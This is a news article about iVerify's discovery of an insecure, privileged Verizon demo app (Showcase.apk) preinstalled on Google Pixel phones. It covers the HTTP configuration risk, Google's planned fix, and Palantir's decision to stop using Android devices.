Google’s flagship Pixel smartphone line touts security as a core feature, offers guaranteed software updates for seven years, and runs stock Android that’s supposed to be free of third-party add-ons and bloatware. But on Thursday, researchers at mobile security firm iVerify published findings on an Android vulnerability that appears to have been present in every Android version for Pixel since September 2017 and could leave the devices vulnerable to tampering and takeover.

The issue affects a software package called “Showcase.apk” that runs at the system level and is invisible to users. The application was developed by enterprise software company Smith Micro for Verizon to put phones into a retail store demo mode – it’s not Google software. Yet it has been included in every Android release for Pixels for years and has extensive system privileges, including remote code execution and remote software installation. Even riskier, the application is designed to download a configuration file over an unencrypted HTTP web connection, which iVerify researchers say could be hijacked by an attacker to take control of the application and then the entire victim device.

iVerify shared its findings with Google in early May, and the tech giant has yet to release a fix for the issue. Google spokesman Ed Fernandez tells WIRED in a statement that Showcase is “no longer used” by Verizon and that Android will remove Showcase from all supported Pixel devices with a software update “in the coming weeks.” He added that Google has seen no evidence of active exploitation and that the app is absent from the new Pixel 9 series devices that Google announced this week. Verizon and Smith Micro did not respond to WIRED’s requests for comment before publication.

“I’ve seen a lot of Android vulnerabilities, and this one is unique in some ways and quite disturbing,” says Rocky Cole, chief operating officer of iVerify and a former U.S. National Security Agency analyst. “When Showcase.apk is run, it can take over the phone. But the code is, frankly, sloppy. It raises questions as to why third-party software running with such high privileges so deep in the operating system hasn’t been tested more thoroughly. It seems to me that Google has pushed bloatware onto Pixel devices around the world.”

iVerify researchers discovered the application after the company’s threat detection scanner detected an unusual validation of an app in the Google Play Store on a user’s device. The client, big data analytics firm Palantir, worked with iVerify to investigate Showcase.apk and report the findings to Google. Dane Stuckey, chief information security officer at Palantir, says the discovery and what he believes was a slow and opaque response from Google prompted Palantir to pull not just Pixel phones but all Android devices across the company.

“Google’s embedding of third-party software in Android’s firmware and not disclosing it to vendors or users creates significant security risks for everyone who relies on that ecosystem,” Stuckey told WIRED. He added that his interactions with Google during the usual 90-day disclosure period “seriously undermined our trust in the ecosystem. To protect our customers, we had to make the difficult decision to move away from Android in our company.”